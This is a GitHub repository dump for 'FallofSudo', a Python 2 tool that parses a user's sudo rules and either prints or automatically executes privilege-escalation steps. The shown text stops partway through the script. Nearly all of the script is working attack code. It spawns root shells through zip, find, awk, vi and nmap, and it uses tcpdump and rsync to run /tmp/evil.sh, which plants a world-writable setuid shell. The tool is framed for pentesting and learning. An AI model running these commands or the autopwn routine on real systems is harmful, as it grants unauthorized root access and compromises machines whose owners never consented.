├── main.png ├── README.md ├── LICENSE └── fallofsudo.py /main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CyberOne-TeamARES/FallOfSudo/HEAD/main.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FallofSudo 2 | 3 | ![alt text](main.png "Main") 4 | 5 | ## Description 6 | Welcome to the FallofSudo project! This has been developed to aid in the exploitation of Linux sudo rules. However, it should also be used in learning how to secure your sudo rules! 7 | 8 | ## Usage 9 | This script has two functions: 10 | * Informational: By passing the ```-i``` command argument the program will show you how to exploit the specific sudo rule you are facing. This is the safest and most preferred way to use this script. 11 | * Autopwn: By passing the ```-a``` command argument the program will auto exploit the specific sudo rule you are facing. Be careful using this argument and ensure you know what you are doing! 12 | 13 | ## Disclaimer 14 | This script should only be used on servers that you own or have explicit permission to do so. 15 | 16 | ## Contribution guidelines 17 | Open an issue and we will get to it as quickly as we can. If you have a ton of additions please reach out to us and we can work together on getting it completed. 18 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 CyberOne Security 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /fallofsudo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | ############################################################################################################### 5 | # Author: Paragonsec (Quentin) @ CyberOne 6 | # Contributor: rmirch (A practice VM will be coming sometime from both of us... oneday) 7 | # Title: fallofsudo.py 8 | # Version: 1.1 9 | # Usage Example: python fallofsudo.py 10 | # Description: This script obtains users Sudo rules and provides ways to abuse them. 11 | # 12 | # STATUS: 44 SUDO RULES 13 | ############################################################################################################### 14 | 15 | import getpass 16 | import os 17 | import subprocess 18 | import sys 19 | import argparse 20 | from subprocess import call 21 | from time import sleep 22 | 23 | 24 | # Arguments 25 | parser = argparse.ArgumentParser(description="This tool attempts to exploit bad sudo rules or shows you how to do it yourself!") 26 | 27 | 28 | parser.add_argument("-a", "--autopwn", 29 | help="This option will engage the autopwn features if they are present", action="store_true") 30 | parser.add_argument("-i", "--info", 31 | help="This option will show you how to pwn the sudo rule instead of doing it automatically", action="store_true") 32 | 33 | # Check to ensure at least one argument has been passed 34 | if len(sys.argv)==1: 35 | parser.print_help(sys.stderr) 36 | sys.exit(1) 37 | 38 | args = parser.parse_args() 39 | 40 | # Global Variables 41 | global info 42 | global autopwn 43 | 44 | #Colors 45 | OKRED = '\033[91m' 46 | OKGREEN = '\033[92m' 47 | OKBLUE = '\033[94m' 48 | OKYELLOW = '\033[93m' 49 | ENDC = '\033[0m' 50 | 51 | 52 | # Banner 53 | banner = (""" 54 | █████▒▄▄▄ ██▓ ██▓ ▒█████ █████▒ ██████ █ ██ ▓█████▄ ▒█████ 55 | ▓██ ▒▒████▄ ▓██▒ ▓██▒ ▒██▒ ██▒▓██ ▒ ▒██ ▒ ██ ▓██▒▒██▀ ██▌▒██▒ ██▒ 56 | ▒████ ░▒██ ▀█▄ ▒██░ ▒██░ ▒██░ ██▒▒████ ░ ░ ▓██▄ ▓██ ▒██░░██ █▌▒██░ ██▒ 57 | ░▓█▒ ░░██▄▄▄▄██ ▒██░ ▒██░ ▒██ ██░░▓█▒ ░ ▒ ██▒▓▓█ ░██░░▓█▄ ▌▒██ ██░ 58 | ░▒█░ ▓█ ▓██▒░██████▒░██████▒ ░ ████▓▒░░▒█░ ▒██████▒▒▒▒█████▓ ░▒████▓ ░ ████▓▒░ 59 | ▒ ░ ▒▒ ▓▒█░░ ▒░▓ ░░ ▒░▓ ░ ░ ▒░▒░▒░ ▒ ░ ▒ ▒▓▒ ▒ ░░▒▓▒ ▒ ▒ ▒▒▓ ▒ ░ ▒░▒░▒░ 60 | ░ ▒ ▒▒ ░░ ░ ▒ ░░ ░ ▒ ░ ░ ▒ ▒░ ░ ░ ░▒ ░ ░░░▒░ ░ ░ ░ ▒ ▒ ░ ▒ ▒░ 61 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ 62 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 63 | ░ 64 | """) 65 | 66 | # Obtaining Username 67 | username = getpass.getuser() 68 | 69 | # Setting output directory 70 | directory = "Output" 71 | if not os.path.exists(directory): 72 | os.makedirs(directory) 73 | 74 | 75 | def main(): 76 | print OKRED + banner + ENDC 77 | print OKGREEN + "Author: " + ENDC + "paragonsec @ CyberOne (https://www.criticalstart.com)" 78 | print OKGREEN + "Contributors: " + ENDC + "rmirch, roman-mueller, caryhooper" 79 | print OKGREEN + "Version: " + ENDC + "1.1" 80 | print OKGREEN + "Description: " + ENDC + "This program aids pentesters in conducting privilege escalation on Linux by abusing sudo. Use for good or training purposes ONLY!\n" 81 | sudopwner() 82 | 83 | 84 | # Function for the y/n questions 85 | def ask_user(answer): 86 | yes = set(['yes','y','']) 87 | no = set(['no','n']) 88 | 89 | while True: 90 | choice = raw_input(answer).lower() 91 | if choice in yes: 92 | return True 93 | elif choice in no: 94 | return False 95 | else: 96 | print "Please respond with 'yes' or 'no'\n" 97 | 98 | 99 | # Main section for sudo pwnage 100 | def sudopwner(): 101 | 102 | print OKBLUE + "[+] Obtaining sudo rules for user " + username + ENDC + "\n" 103 | 104 | # Obtaining SUDO rules 105 | sudofile() 106 | 107 | # Print contents of sudo rules 108 | sudorules = sudoparse() 109 | 110 | # Identifying sudo rules and choosing a potential pwnage for that rule 111 | print OKBLUE + "\n[+] Identifying potential pwnage... \n" + ENDC 112 | choices = [] 113 | for item in sudorules: 114 | if item[3] == "ALL": 115 | all_user = item[0] 116 | choices.append('all') 117 | elif 'zip' in item[3]: 118 | zip_user = item[0] 119 | choices.append('zip') 120 | elif 'find' in item[3]: 121 | find_user = item[0] 122 | choices.append('find') 123 | elif 'tcpdump' in item[3]: 124 | tcpdump_user = item[0] 125 | choices.append('tcpdump') 126 | elif 'rsync' in item[3]: 127 | rsync_user = item[0] 128 | choices.append('rsync') 129 | elif 'python' in item[3]: 130 | python_user = item[0] 131 | choices.append('python') 132 | elif 'vi' in item[3]: 133 | vi_user = item[0] 134 | choices.append('vi') 135 | elif 'nmap' in item[3]: 136 | nmap_user = item[0] 137 | choices.append('nmap') 138 | elif 'awk' in item[3]: 139 | awk_user = item[0] 140 | choices.append('awk') 141 | elif 'vim' in item[3]: 142 | vim_user = item[0] 143 | choices.append('vim') 144 | elif 'perl' in item[3]: 145 | perl_user = item[0] 146 | choices.append('perl') 147 | elif 'ruby' in item[3]: 148 | ruby_user = item[0] 149 | choices.append('ruby') 150 | elif 'bash' in item[3]: 151 | bash_user = item[0] 152 | choices.append('bash') 153 | elif 'nc' in item[3]: 154 | nc_user = item[0] 155 | choices.append('nc') 156 | elif 'less' in item[3]: 157 | less_user = item[0] 158 | choices.append('less') 159 | elif 'more' in item[3]: 160 | more_user = item[0] 161 | choices.append('more') 162 | elif 'man' in item[3]: 163 | man_user = item[0] 164 | choices.append('man') 165 | elif 'gdb' in item[3]: 166 | gdb_user = item[0] 167 | choices.append('gdb') 168 | elif 'ftp' in item[3]: 169 | ftp_user = item[0] 170 | choices.append('ftp') 171 | elif 'smbclient' in item[3]: 172 | smbclient_user = item[0] 173 | choices.append('smbclient') 174 | elif 'sed' in item[3]: 175 | sed_user = item[0] 176 | choices.append('sed') 177 | elif 'mysql' in item[3]: 178 | mysql_user = item[0] 179 | choices.append('mysql') 180 | elif 'tar' in item[3]: 181 | tar_user = item[0] 182 | choices.append('tar') 183 | elif 'wget' in item[3]: 184 | choices.append('wget') 185 | elif 'curl' in item[3]: 186 | choices.append('curl') 187 | elif 'mv' in item[3]: 188 | choices.append('mv') 189 | elif 'tee' in item[3]: 190 | choices.append('tee') 191 | elif 'scp' in item[3]: 192 | choices.append('scp') 193 | elif 'ssh' in item[3]: 194 | ssh_user = item[0] 195 | choices.append('ssh') 196 | elif 'cp' in item[3]: 197 | choices.append('cp') 198 | elif 'dd' in item[3]: 199 | choices.append('dd') 200 | elif 'crontab' in item[3]: 201 | choices.append('crontab') 202 | elif 'chown' in item[3]: 203 | choices.append('chown') 204 | elif 'chmod' in item[3]: 205 | choices.append('chmod') 206 | elif 'cat' in item[3]: 207 | cat_user = item[0] 208 | choices.append('cat') 209 | elif 'mount' in item[3]: 210 | choices.append('mount') 211 | elif 'facter' in item[3]: 212 | facter_user = item[0] 213 | choices.append('facter') 214 | elif 'apt-get' in item[3]: 215 | choices.append('apt-get') 216 | elif '/sh' in item[3]: 217 | sh_user = item[0] 218 | choices.append('sh') 219 | elif 'ksh' in item[3]: 220 | ksh_user = item[0] 221 | choices.append('ksh') 222 | elif 'zsh' in item[3]: 223 | zsh_user = item[0] 224 | choices.append('zsh') 225 | elif 'nano' in item[3]: 226 | nano_user = item[0] 227 | choices.append('nano') 228 | elif 'journalctl' in item[3]: 229 | journalctl_user = item[0] 230 | choices.append('journalctl') 231 | elif 'dmesg' in item[3]: 232 | dmesg_user = item[0] 233 | choices.append('dmesg') 234 | elif 'nice' in item[3]: 235 | nice_user = item[0] 236 | choices.append('nice') 237 | 238 | 239 | # Options for the user to choose which sudo rule they wish to abuse 240 | for item in choices: 241 | if (item == "all") or (item == "sh") or (item == "bash") or (item == "ksh") or (item == "zsh"): 242 | print OKRED + "[!] Vulnerable sudo rule [EASY TO PWN]: " + ENDC + item 243 | else: 244 | print OKRED + "[!] Vulnerable sudo rule: " + ENDC + item 245 | 246 | question = raw_input("\n" + OKBLUE + "[?] Enter name of sudo rule you wish to pwn: " + ENDC) 247 | 248 | if question == "all": 249 | all(all_user) 250 | elif question == "zip": 251 | zip(zip_user) 252 | elif question == "find": 253 | find(find_user) 254 | elif question == "tcpdump": 255 | tcpdump(tcpdump_user) 256 | elif question == "rsync": 257 | rsync(rsync_user) 258 | elif question == "python": 259 | python(python_user) 260 | elif question == "vi": 261 | vi(vi_user) 262 | elif question == "nmap": 263 | nmap(nmap_user) 264 | elif question == "awk": 265 | awk(awk_user) 266 | elif question == "vim": 267 | vim(vim_user) 268 | elif question == "perl": 269 | perl(perl_user) 270 | elif question == "ruby": 271 | ruby(ruby_user) 272 | elif question == "bash": 273 | bash(bash_user) 274 | elif question == "nc": 275 | nc(nc_user) 276 | elif question == "less": 277 | less(less_user) 278 | elif question == "more": 279 | more(more_user) 280 | elif question == "man": 281 | man(man_user) 282 | elif question == "gdb": 283 | gdb(gdb_user) 284 | elif question == "ftp": 285 | ftp(ftp_user) 286 | elif question == "smbclient": 287 | smbclient(smbclient_user) 288 | elif question == "sed": 289 | sed(sed_user) 290 | elif question == "mysql": 291 | mysql(mysql_user) 292 | elif question == "tar": 293 | tar(tar_user) 294 | elif question == "wget": 295 | wget() 296 | elif question == "curl": 297 | curl() 298 | elif question == "mv": 299 | mv() 300 | elif question == "tee": 301 | tee() 302 | elif question == "scp": 303 | scp() 304 | elif question == "ssh": 305 | ssh(ssh_user) 306 | elif question == "cp": 307 | cp() 308 | elif question == "dd": 309 | dd() 310 | elif question == "crontab": 311 | crontab() 312 | elif question == "chown": 313 | chown() 314 | elif question == "chmod": 315 | chmod() 316 | elif question == "cat": 317 | cat(cat_user) 318 | elif question == "mount": 319 | mount() 320 | elif question == "facter": 321 | facter(facter_user) 322 | elif question == "apt-get": 323 | aptget() 324 | elif question == "sh": 325 | sh(sh_user) 326 | elif question == "ksh": 327 | ksh(ksh_user) 328 | elif question == "zsh": 329 | zsh(zsh_user) 330 | elif question == "nano": 331 | nano(nano_user) 332 | elif question == "journalctl": 333 | journalctl(journalctl_user) 334 | elif question == "dmesg": 335 | dmesg(dmesg_user) 336 | elif question == "nice": 337 | nice(nice_user) 338 | else: 339 | print OKRED + "[!] No rule matching that input... exiting you n00b!" + ENDC 340 | sys.exit() 341 | 342 | # Saving sudo rules to a csv file for easy parsing 343 | def sudofile(): 344 | 345 | # File to save sudo rules output 346 | fname = "Output/sudorules.txt" 347 | f = open(fname, "w+") 348 | 349 | # run the sudo -ll command 350 | # Update suggested by jesmith 351 | try: 352 | sudoll = subprocess.check_output(['sudo' , '-ll']) 353 | except subprocess.CalledProcessError as e: 354 | print e.output 355 | sys.exit(1) 356 | 357 | sudoll = subprocess.check_output(['sudo' , '-ll']) 358 | 359 | # Saving sudoll output to file 360 | f.write(sudoll) 361 | f.close 362 | 363 | 364 | # Used to parse the contents of the sudo output 365 | def sudoparse(): 366 | 367 | sudooutput = [] 368 | commands_block = 0 369 | 370 | # Loop through the SUDO rules gathed earlier 371 | with open('Output/sudorules.txt', 'r') as sudoers: 372 | for line in sudoers: 373 | line = line.strip() 374 | if not line.startswith('Sudoers'): 375 | continue 376 | runas_user = runas_group = options = cmd = None 377 | for line in sudoers: 378 | line = line.strip() 379 | k = line.split(':')[-1].strip() 380 | if line.lower().startswith('runasusers'): 381 | runas_user = k 382 | elif line.lower().startswith('runasgroups'): 383 | runas_group = k 384 | elif line.lower().startswith('options'): 385 | options = k 386 | elif line.lower().startswith('commands') : 387 | commands_block = 1 388 | elif commands_block == 1: 389 | cmd = line.strip() 390 | if cmd and not cmd.startswith('Sudoers entry'): 391 | sudooutput.append([runas_user, runas_group, options, cmd]) 392 | 393 | # Printing out SUDO rules for the user 394 | print OKGREEN + "[!] " + username + " has the following sudo rules:" + ENDC 395 | for item in sudooutput: 396 | print OKGREEN + "\n[!] RunAsUsers: " + ENDC + item[0] 397 | if item[1] != None: 398 | print OKGREEN + "[!] RunAsGroups: " + ENDC + item[1] 399 | if item[2] != None: 400 | print OKGREEN + "[!] Options: " + ENDC + item[2] 401 | print OKGREEN + "[!] Commands: " + ENDC + item[3] 402 | 403 | return sudooutput 404 | 405 | # SUDO zip Rule Pwnage 406 | def zip(zip_user): 407 | 408 | if args.info: 409 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 410 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 411 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 412 | print OKBLUE + "[1] First we need to create a empty file to pass to the zip command: " + ENDC 413 | print OKRED + " [*] touch /tmp/foo" + ENDC 414 | print OKBLUE + "[2] Finally we will execute the sudo rule using the unzip-command argument: " + ENDC 415 | if (zip_user == "ALL") or (zip_user == "root"): 416 | print OKRED + " [*] sudo zip /tmp/foo.zip /tmp/foo -T --unzip-command='sh -c /bin/bash'" + ENDC 417 | else: 418 | print OKRED + " [*] sudo -u " + zip_user + " zip /tmp/foo.zip /tmp/foo -T --unzip-command='sh -c /bin/bash'" + ENDC 419 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 420 | sys.exit() 421 | 422 | elif args.autopwn: 423 | 424 | question = ask_user( OKRED + '\n[?] Do you wish to abuse the zip rule? ' + ENDC) 425 | 426 | if question == True: 427 | 428 | # First step of pwnage for zip 429 | print OKGREEN + "\n[!] First Step: " + ENDC + "Creating /tmp/foo" 430 | call('touch /tmp/foo', shell=True) 431 | 432 | sleep(0.5) 433 | 434 | # Exploit the sudo rule zip 435 | print OKGREEN + "[!] Pwning ZIP rule now!!!" + ENDC 436 | if (zip_user == "ALL") or (zip_user == "root"): 437 | print OKGREEN + "\n[!] Getting shell as root!" + ENDC 438 | call('sudo zip /tmp/foo.zip /tmp/foo -T --unzip-command="sh -c /bin/bash"', shell=True) 439 | else: 440 | print OKGREEN + "\n[!] Getting shell as " + zip_user + "!" + ENDC 441 | call('sudo -u ' + zip_user + ' zip /tmp/foo.zip /tmp/foo -T --unzip-command="sh -c /bin/bash"', shell=True) 442 | 443 | elif question == False: 444 | sudopwner() 445 | 446 | 447 | # SUDO ALL Rule Pwnage 448 | def all(all_user): 449 | 450 | if args.info: 451 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 452 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 453 | print OKBLUE + "[+] To pwn this rule type one of the two commands: " + ENDC 454 | print OKRED + "[*] sudo -i" + ENDC 455 | if (all_user == "ALL") or (all_user == "root"): 456 | print OKRED + "[*] sudo su" + ENDC 457 | else: 458 | print OKRED + "[*] sudo su " + all_user + ENDC 459 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 460 | sys.exit() 461 | 462 | elif args.autopwn: 463 | 464 | question = ask_user( OKRED + '\n[?] Do you wish to abuse the ALL/ALL rule? ' + ENDC) 465 | 466 | if question == True: 467 | 468 | # Exploit the sudo rule ALL/ALL 469 | print OKGREEN + "\n[!] Pwning the ALL/ALL rule now!!!" + ENDC 470 | 471 | print OKGREEN + "\n[!] Executing 'sudo su' to gain shell!" + ENDC 472 | if all_user == "ALL": 473 | print OKGREEN + "\n[!] Gaining shell as root!" + ENDC 474 | call('sudo su', shell=True) 475 | else: 476 | print OKGREEN + "\n[!] Gaining shell as " + all_user + "!" + ENDC 477 | call('sudo su ' + all_user, shell=True) 478 | 479 | elif question == False: 480 | sudopwner() 481 | 482 | 483 | # SUDO find Rule Pwnage 484 | def find(find_user): 485 | 486 | if args.info: 487 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 488 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 489 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 490 | if (find_user == "ALL") or (find_user == "root"): 491 | print OKRED + "[*] sudo find . -exec bash -i \;" + ENDC 492 | else: 493 | print OKRED + "[*] sudo -u " + find_user + " find . -exec bash -i \;" + ENDC 494 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 495 | sys.exit() 496 | 497 | elif args.autopwn: 498 | 499 | question = ask_user( OKRED + '\n[?] Do you wish to abuse the find rule? ' + ENDC) 500 | 501 | if question == True: 502 | 503 | # Exploit the sudo rule find 504 | print OKGREEN + "\n[!] Pwning the find rule now!!!" + ENDC 505 | print OKGREEN + "\n[!] Executing 'sudo find . -exec bash -i \;' to gain shell!!!" + ENDC 506 | if (find_user == "ALL") or (find_user == "root"): 507 | print OKGREEN + "\n[!] Getting shell as root!" + ENDC 508 | call('sudo find . -exec bash -i \;', shell=True) 509 | else: 510 | print OKGREEN + "\n[!] Getting shell as " + find_user + "!" + ENDC 511 | call('sudo -u ' + find_user + ' find . -exec bash -i \;', shell=True) 512 | 513 | 514 | elif question == False: 515 | sudopwner() 516 | 517 | 518 | # SUDO tcpdump Rule Pwnage 519 | def tcpdump(tcpdump_user): 520 | 521 | if args.info: 522 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 523 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 524 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 525 | print OKBLUE + "[1] First create a malicious file in a partition that allows setuid: " + ENDC 526 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 527 | print OKBLUE + "[2] Next we need to change that maliciouos file to be executable: " + ENDC 528 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 529 | print OKBLUE + "[3] Next we will abuse the packet rotate feature of TCPDUMP in order to execute our malicious script: " + ENDC 530 | if (tcpdump_user == "ALL") or (tcpdump_user == "root"): 531 | print OKRED + " [*] sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/evil.sh -Z root" + ENDC 532 | else: 533 | print OKRED + " [*] sudo -u " + tcpdump_user + " tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/evil.sh -Z " + tcpdump_user + ENDC 534 | print OKBLUE + "[4] Finally execute your /tmp/pwnage file that was created!" + ENDC 535 | print OKRED + " [*] ./pwnage" + ENDC 536 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 537 | sys.exit() 538 | 539 | elif args.autopwn: 540 | 541 | question = ask_user( OKRED + '\n[?] Do you wish to abuse the tcpdump rule? ' + ENDC) 542 | 543 | if question == True: 544 | 545 | print OKGREEN + "\n[!] Pwning the tcpdump rule now!!!" + ENDC 546 | print OKGREEN + "\n[!] Creating malicous file!" + ENDC 547 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 548 | call("chmod +x /tmp/evil.sh",shell=True) 549 | 550 | sleep(0.5) 551 | 552 | print OKGREEN + "\n[!] Running TCPDUMP packet rotate to execute our malicious script (read the source to see the payload)!" + ENDC 553 | if (tcpdump_user == "ALL") or (tcpdump_user == "root"): 554 | print OKGREEN + "\n[!] Creating setuid shell as root!" + ENDC 555 | call("sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/evil.sh -Z root", shell=True) 556 | else: 557 | print OKGREEN + "\n[!] Creating setuid shell as " + tcpdump_user + "!" + ENDC 558 | call("sudo -u " + tcpdump_user + " tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/evil.sh -Z " + tcpdump_user, shell=True) 559 | 560 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 561 | 562 | elif question == False: 563 | sudopwner() 564 | 565 | 566 | # SUDO rsync Rule Pwnage 567 | def rsync(rsync_user): 568 | 569 | if args.info: 570 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 571 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 572 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 573 | print OKBLUE + "[1] First create a malicious file in a partition that allows setuid: " + ENDC 574 | print OKRED + " [*] echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh" + ENDC 575 | print OKBLUE + "[2] Next we need to change that maliciouos file to be executable: " + ENDC 576 | print OKRED + " [*] chmod +x /tmp/evil.sh" + ENDC 577 | print OKBLUE + "[3] Next we need to create a empty file to pass to the rsync command: " + ENDC 578 | print OKRED + " [*] touch /tmp/aaa" + ENDC 579 | print OKBLUE + "[4] Next we will execute the rsync command in order to run our evil.sh script: " + ENDC 580 | if (rsync_user == "ALL") or (rsync_user == "root"): 581 | print OKRED + " [*] sudo rsync -e /tmp/evil.sh @127.0.0.1:/tmp/aaa bbb" + ENDC 582 | else: 583 | print OKRED + " [*] sudo -u " + rsync_user + " rsync -e /tmp/evil.sh @127.0.0.1:/tmp/aaa bbb" + ENDC 584 | print OKBLUE + "[5] Finally execute your /tmp/pwnage file that was created!" + ENDC 585 | print OKRED + " [*] ./pwnage" + ENDC 586 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 587 | sys.exit() 588 | 589 | elif args.autopwn: 590 | 591 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the rsync rule? " + ENDC) 592 | 593 | if question == True: 594 | 595 | print OKGREEN + "\n[!] Pwning the tcpdump rule now!!!" + ENDC 596 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 597 | call("echo 'cp /bin/ksh /tmp/pwnage ; chmod 4777 /tmp/pwnage' > /tmp/evil.sh", shell=True) 598 | call("chmod +x /tmp/evil.sh", shell=True) 599 | 600 | sleep(0.5) 601 | 602 | print OKGREEN + "\n[!] Creating /tmp/aaa file!" + ENDC 603 | call("touch /tmp/aaa",shell=True) 604 | 605 | sleep(0.5) 606 | 607 | print OKGREEN + "\n[!] Running rsync command!" + ENDC 608 | 609 | if (rsync_user == "ALL") or (rsync_user == "root"): 610 | print OKGREEN + "\n[!] Creating setuid shell as root!" + ENDC 611 | call("sudo rsync -e /tmp/evil.sh " + username + "@127.0.0.1:/tmp/aaa bbb", shell=True) 612 | else: 613 | print OKGREEN + "\n[!] Creating setuid shell as " + rsync_user + "!" + ENDC 614 | call("sudo -u " + rsync_user + " rsync -e /tmp/evil.sh " + username + "@127.0.0.1:/tmp/aaa bbb", shell=True) 615 | 616 | print OKGREEN + "\n[!] EXECUTE /tmp/pwnage TO GET SHELL!" + ENDC 617 | 618 | if question == False: 619 | sudopwner() 620 | 621 | # SUDO awk Rule Pwnage 622 | def awk(awk_user): 623 | 624 | if args.info: 625 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 626 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 627 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 628 | if (awk_user == "ALL") or (awk_user == "root"): 629 | print OKRED + "[*] sudo awk 'BEGIN {system('/bin/bash')}'" + ENDC 630 | else: 631 | print OKRED + "[*] sudo -u " + awk_user + " awk 'BEGIN {system('/bin/bash')}'" + ENDC 632 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 633 | sys.exit() 634 | 635 | elif args.autopwn: 636 | 637 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the awk rule? " + ENDC) 638 | 639 | if question == True: 640 | 641 | print OKGREEN + "\n[!] Pwning the awk rule now!!!" + ENDC 642 | if (awk_user == "ALL") or (awk_user == "root"): 643 | print OKGREEN + "\n[!] Getting shell as root!" + ENDC 644 | call("sudo awk 'BEGIN {system('/bin/bash')}'", shell=True) 645 | else: 646 | print OKGREEN + "\n[!] Getting shell as " + awk_user + "!" + ENDC 647 | call("sudo -u " + awk_user + " awk 'BEGIN {system('/bin/bash')}", shell=True) 648 | 649 | if question == False: 650 | sudopwner() 651 | 652 | 653 | # SUDO nmap Rule Pwnage 654 | def nmap(nmap_user): 655 | 656 | if args.info: 657 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 658 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 659 | print OKBLUE + "[+] To pwn this rule multiple steps need to be taken." + ENDC 660 | print OKBLUE + "[1] First create a malicious nse script to execute: " + ENDC 661 | print OKRED + " [*] echo 'os.execute('/bin/sh')' > /tmp/pwnage.nse" + ENDC 662 | print OKBLUE + "[2] Finally execute that nse script with nmap: " + ENDC 663 | if (nmap_user == "ALL") or (nmap_user == "root"): 664 | print OKRED + " [*] sudo nmap --script=/tmp/pwnage.nse" + ENDC 665 | else: 666 | print OKRED + " [*] sudo -u " + nmap_user + " nmap --script=/tmp/pwnage.nse" + ENDC 667 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 668 | sys.exit() 669 | 670 | elif args.autopwn: 671 | 672 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the nmap rule? " + ENDC) 673 | 674 | if question == True: 675 | 676 | print OKGREEN + "\n[!] Pwning the nmap rule now!!!" + ENDC 677 | print OKGREEN + "\n[!] Creating malicious file!" + ENDC 678 | 679 | call("echo 'os.execute('/bin/sh')' > /tmp/pwnage.nse", shell=True) 680 | 681 | if (nmap_user == "ALL") or (nmap_user == "root"): 682 | print OKGREEN + "\n[!] Obtaining root shell!" + ENDC 683 | call("sudo nmap --script=/tmp/pwnage.nse", shell=True) 684 | else: 685 | print OKGREEN + "\n[!] Obtaining shell as " + nmap_user + "!" + ENDC 686 | call("sudo -u " + nmap_user + " nmap --script=/tmp/pwnage.nse", shell=True) 687 | 688 | if question == False: 689 | sudopwner() 690 | 691 | 692 | # SUDO vi Rule Pwnage 693 | def vi(vi_user): 694 | 695 | if args.info: 696 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------" + ENDC 697 | print OKYELLOW + "\n[!] HOW TO PWN THIS RULE!!!" + ENDC 698 | print OKBLUE + "[+] To pwn this rule type the following command: " + ENDC 699 | if (vi_user == "ALL") or (vi_user == "root"): 700 | print OKRED + "[*] sudo vi -c ':shell'" + ENDC 701 | else: 702 | print OKRED + "[*] sudo -u " + vi_user + " vi -c ':shell'" + ENDC 703 | print OKYELLOW + "\n-----------------------------------------------------------------------------------------------------------------------------\n" + ENDC 704 | sys.exit() 705 | 706 | elif args.autopwn: 707 | 708 | question = ask_user( OKRED + "\n[?] Do you wish to abuse the vi rule? " + ENDC) 709 | 710 | if question == True: 711 | 712 | print OKGREEN + "\n[!] Pwning the vi rule now!!!" + ENDC 713 | 714 | if (vi_user == "ALL") or (vi_user == "root"): 715 | print OKGREEN + "\n[!] Obtaining shell as root!" + ENDC 716 | call("sudo vi -c ':shell'", shell=True) 717 | else: 718 | print OKGREEN + "\n[!] Obtaining shell as " + vi_user + "!" + ENDC 719 | call("sudo -u " + vi_user + " vi -c ':shell'", shell=True) 720 | 721 | if question == False: 722 | sudopwner() 723 | 724 | 725 | # SUDO vim Rule Pwnage 726 | def vim(vim_user): 727 | 728 